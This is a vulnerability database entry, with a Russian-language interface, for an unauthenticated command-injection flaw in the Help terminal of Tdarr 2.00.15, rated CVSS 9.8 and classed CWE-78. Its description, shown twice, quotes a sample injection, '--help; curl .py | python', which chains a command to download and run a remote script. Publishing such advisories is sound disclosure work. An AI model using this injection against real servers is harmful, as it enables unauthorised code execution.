Описание
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like --help; curl .py | python to execute remote code without authentication.
Ссылки
- Product
- ExploitThird Party Advisory
- Third Party Advisory
Уязвимые конфигурации
Конфигурация 1
cpe:2.3:a:tdarr:tdarr:2.00.15:*:*:*:*:*:*:*
EPSS
Процентиль: 68%
0.00554
Низкий
9.8 Critical
CVSS3
Дефекты
CWE-78
Связанные уязвимости
CVSS3: 9.8
github
25 дней назад
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
EPSS
Процентиль: 68%
0.00554
Низкий
9.8 Critical
CVSS3
Дефекты
CWE-78